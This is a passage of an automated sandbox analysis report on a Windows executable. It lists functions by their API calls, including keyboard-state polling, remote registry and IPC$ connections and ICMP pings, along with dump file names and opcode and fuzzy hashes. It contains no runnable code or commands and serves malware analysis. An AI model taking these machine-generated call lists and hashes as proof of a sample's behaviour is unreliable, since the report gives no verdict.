                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00138BBA,00000000), ref: 001769D4
                                                          • DeleteObject.GDI32(00000000), ref: 001769E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: 77b90b6d61f5e1483c949d914d8dc856bb78b9791f7224cdcc6e1f2d093e19c4
                                                          • Instruction ID: d99da8323a7882f0eaed709b9dad48a23aea794cd88e2b52e4adf34321684e98
                                                          • Opcode Fuzzy Hash: 77b90b6d61f5e1483c949d914d8dc856bb78b9791f7224cdcc6e1f2d093e19c4
                                                          • Instruction Fuzzy Hash: 53616A31502B00EFCB259F25DA58B66B7F1FB5031AF14951CF046AB9A0CB75ADC0DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139944: GetWindowLongW.USER32(?,000000EB), ref: 00139952
                                                          • GetSysColor.USER32(0000000F), ref: 00139862
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: f7ac4ac02bec73373bb96c5805e93b4e2d5e384beaba19adf2536ef27962e683
                                                          • Instruction ID: 8a449e27edc5ff2a6503f75cfdde598730740a2fbb40247db9b5e39f2b24c257
                                                          • Opcode Fuzzy Hash: f7ac4ac02bec73373bb96c5805e93b4e2d5e384beaba19adf2536ef27962e683
                                                          • Instruction Fuzzy Hash: 2941A231104644EFDF205F3C9C88BBA7BA5EB86330F144655F9A6972E1D7B19C81DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0016F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00189717
                                                          • LoadStringW.USER32(00000000,?,0016F7F8,00000001), ref: 00189720
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0016F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00189742
                                                          • LoadStringW.USER32(00000000,?,0016F7F8,00000001), ref: 00189745
                                                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00189866
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 747408836-2268648507
                                                          • Opcode ID: 3ea2d3072c87150b6cc60fcb05a53c1f652bd16b98b55d4682d03fa540e076df
                                                          • Instruction ID: 852b6f1a972b42573d28a345665ca15a28abf121f60dcbd8114bf3aa33ccf74d
                                                          • Opcode Fuzzy Hash: 3ea2d3072c87150b6cc60fcb05a53c1f652bd16b98b55d4682d03fa540e076df
                                                          • Instruction Fuzzy Hash: 79412B7290021DAACB04FBE5EE86DEEB778AF25340F540465F50572092EB356F58CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001807A2
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001807BE
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001807DA
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00180804
                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0018082C
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00180837
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0018083C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 323675364-22481851
                                                          • Opcode ID: d2bd497b8812e61778f16d9be6f873dcc6d65b4d461292409cdd99e5602a8d2d
                                                          • Instruction ID: d486cc5d323aac52047db369c3d3c3e78a44c590f03f04122491c6502d496fb2
                                                          • Opcode Fuzzy Hash: d2bd497b8812e61778f16d9be6f873dcc6d65b4d461292409cdd99e5602a8d2d
                                                          • Instruction Fuzzy Hash: 87411672C1022DABCF11EBA4EC858EDB778BF18354F444129F911A71A1EB309E58CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 001A3C5C
                                                          • CoInitialize.OLE32(00000000), ref: 001A3C8A
                                                          • CoUninitialize.OLE32 ref: 001A3C94
                                                          • _wcslen.LIBCMT ref: 001A3D2D
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 001A3DB1
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 001A3ED5
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001A3F0E
                                                          • CoGetObject.OLE32(?,00000000,001BFB98,?), ref: 001A3F2D
                                                          • SetErrorMode.KERNEL32(00000000), ref: 001A3F40
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001A3FC4
                                                          • VariantClear.OLEAUT32(?), ref: 001A3FD8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                          • String ID:
                                                          • API String ID: 429561992-0
                                                          • Opcode ID: 9cc2072459c19ade325d509b8cedc017969be2050af18f16d476edb30f622816
                                                          • Instruction ID: d04295e8185fd4ae067f7f8b30da6672b2b18c73051aa318c6849be6b6001378
                                                          • Opcode Fuzzy Hash: 9cc2072459c19ade325d509b8cedc017969be2050af18f16d476edb30f622816
                                                          • Instruction Fuzzy Hash: C9C144756083059FC700DF68C884A2BBBE9FF8A744F10491DF99A9B251D730EE46CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00197AF3
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00197B8F
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00197BA3
                                                          • CoCreateInstance.OLE32(001BFD08,00000000,00000001,001E6E6C,?), ref: 00197BEF
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00197C74
                                                          • CoTaskMemFree.OLE32(?,?), ref: 00197CCC
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00197D57
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00197D7A
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00197D81
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00197DD6
                                                          • CoUninitialize.OLE32 ref: 00197DDC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                          • String ID:
                                                          • API String ID: 2762341140-0
                                                          • Opcode ID: 22267d7026b047efa680713507f80288f0745296cd1917c95ee3bf7b8693201e
                                                          • Instruction ID: f573b146cee5d35099b479d8e0bbaab9dc43592275971fc33904e3386aa411aa
                                                          • Opcode Fuzzy Hash: 22267d7026b047efa680713507f80288f0745296cd1917c95ee3bf7b8693201e
                                                          • Instruction Fuzzy Hash: E6C12A75A04119AFCB14DFA4D884DAEBBF9FF48304B148599F81ADB661D730EE81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001B5504
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001B5515
                                                          • CharNextW.USER32(00000158), ref: 001B5544
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001B5585
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001B559B
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001B55AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CharNext
                                                          • String ID:
                                                          • API String ID: 1350042424-0
                                                          • Opcode ID: 8e69883e3fef597238d5e49a3cc53a3479a42db48a4d4cf9261586443b2acc07
                                                          • Instruction ID: ac6baf5dfae291ac49f7948f54455374fd5df975882bb57c3b9db9cccb7cbd7f
                                                          • Opcode Fuzzy Hash: 8e69883e3fef597238d5e49a3cc53a3479a42db48a4d4cf9261586443b2acc07
                                                          • Instruction Fuzzy Hash: 5B618C30900608EFDF209F94CC84EFE7BBAEF09765F104145F925AB290D7749A81DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0017FAAF
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 0017FB08
                                                          • VariantInit.OLEAUT32(?), ref: 0017FB1A
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0017FB3A
                                                          • VariantCopy.OLEAUT32(?,?), ref: 0017FB8D
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0017FBA1
                                                          • VariantClear.OLEAUT32(?), ref: 0017FBB6
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0017FBC3
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0017FBCC
                                                          • VariantClear.OLEAUT32(?), ref: 0017FBDE
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0017FBE9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 41802e99fb8f9118cf9d68a33746474cf21bbeb56f3ac7eafb9a065a532d6f82
                                                          • Instruction ID: 4d2616eb613784395c456c7d6af120fa82c5da6e345d48de0b8b91cf488ce214
                                                          • Opcode Fuzzy Hash: 41802e99fb8f9118cf9d68a33746474cf21bbeb56f3ac7eafb9a065a532d6f82
                                                          • Instruction Fuzzy Hash: E4415F35A00219DFCB00DF68D8549EEBBB9EF58344F008169E959A7661CB30AA46CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00189CA1
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00189D22
                                                          • GetKeyState.USER32(000000A0), ref: 00189D3D
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00189D57
                                                          • GetKeyState.USER32(000000A1), ref: 00189D6C
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00189D84
                                                          • GetKeyState.USER32(00000011), ref: 00189D96
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00189DAE
                                                          • GetKeyState.USER32(00000012), ref: 00189DC0
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00189DD8
                                                          • GetKeyState.USER32(0000005B), ref: 00189DEA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 5ce415fb6c268b29dafdea8bedb34cdebcedbc11a8afa5a67c145b92d296ddd5
                                                          • Instruction ID: f17a465ccb29c29fd065cf1e9030ab94739100574da601a8c93bec63582b942f
                                                          • Opcode Fuzzy Hash: 5ce415fb6c268b29dafdea8bedb34cdebcedbc11a8afa5a67c145b92d296ddd5
                                                          • Instruction Fuzzy Hash: 2541A8346047CA6DFF31B6A4C8443B5BEE06F11344F0C815ADAC6566C2DBA59BC8CFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 001A05BC
                                                          • inet_addr.WSOCK32(?), ref: 001A061C
                                                          • gethostbyname.WSOCK32(?), ref: 001A0628
                                                          • IcmpCreateFile.IPHLPAPI ref: 001A0636
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001A06C6
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001A06E5
                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 001A07B9
                                                          • WSACleanup.WSOCK32 ref: 001A07BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: f4515bac6d024fbfc689294485568241757f4830981be79a2fcdb2891dd0f00f
                                                          • Instruction ID: 84a89c5156b86da8a4850dcb4b16cfeec50bd694ae807e8a1460e26bd478594f
                                                          • Opcode Fuzzy Hash: f4515bac6d024fbfc689294485568241757f4830981be79a2fcdb2891dd0f00f
                                                          • Instruction Fuzzy Hash: C691B0795042019FD321CF19D888F1ABBE0AF49318F1585A9F4A99B7A2C730FD85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharLower
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 707087890-567219261
                                                          • Opcode ID: d4f34131ac90ffacae30199cf3840cc7170984805e821ba71f7a5d810c6c4fc2
                                                          • Instruction ID: c37522272701cf2287ca63ec43299ecc1c75a8e9a5324de7c06932eeb0bb9012
                                                          • Opcode Fuzzy Hash: d4f34131ac90ffacae30199cf3840cc7170984805e821ba71f7a5d810c6c4fc2
                                                          • Instruction Fuzzy Hash: DF519035A00516DBCF14DFACC9509BEB7A5BF66724B214229E426E72C4EB30DD40C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CoInitialize.OLE32 ref: 001A3774
                                                          • CoUninitialize.OLE32 ref: 001A377F
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,001BFB78,?), ref: 001A37D9
                                                          • IIDFromString.OLE32(?,?), ref: 001A384C
                                                          • VariantInit.OLEAUT32(?), ref: 001A38E4
                                                          • VariantClear.OLEAUT32(?), ref: 001A3936
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 636576611-1287834457
                                                          • Opcode ID: bce225831fce39d6e43455477221bea49c0c0102e0809247b5a49ba98e79286f
                                                          • Instruction ID: 7daff0098cba165ff521b87dc9f86295780768710f9ac69cf962dbacf05b8576
                                                          • Opcode Fuzzy Hash: bce225831fce39d6e43455477221bea49c0c0102e0809247b5a49ba98e79286f
                                                          • Instruction Fuzzy Hash: 5F61DF74608301AFD311DF54D888F6ABBE8EF4A710F10090DF9959B291C774EE48CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001933CF
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001933F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LoadString$_wcslen
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 4099089115-3080491070
                                                          • Opcode ID: 2f558e1d56f9d6b7693da22af93323052370ca226c85aa104a25c332c957228f
                                                          • Instruction ID: 21007245480dff81b311097c342dd096cc3cb1793e833d11dd2394987115a3bd
                                                          • Opcode Fuzzy Hash: 2f558e1d56f9d6b7693da22af93323052370ca226c85aa104a25c332c957228f
                                                          • Instruction Fuzzy Hash: E9518C72D00219AADF15EBA0ED42EEEB778BF28340F144065F41572092EB356FA8DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 1256254125-769500911
                                                          • Opcode ID: a290dab3a45d0fd2eb83715ddcc0565a68e77f094c961789711cbabf0941c1ae
                                                          • Instruction ID: 32c6d872e6894548eedea47de4e5128819d8025ea9be2bbe73fc82f76d4a337c
                                                          • Opcode Fuzzy Hash: a290dab3a45d0fd2eb83715ddcc0565a68e77f094c961789711cbabf0941c1ae
                                                          • Instruction Fuzzy Hash: 1141D432A081269BCB207F7DC9D05BE77A5AF74794B754129E425DB284F731CE81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 001953A0
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00195416
                                                          • GetLastError.KERNEL32 ref: 00195420
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 001954A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
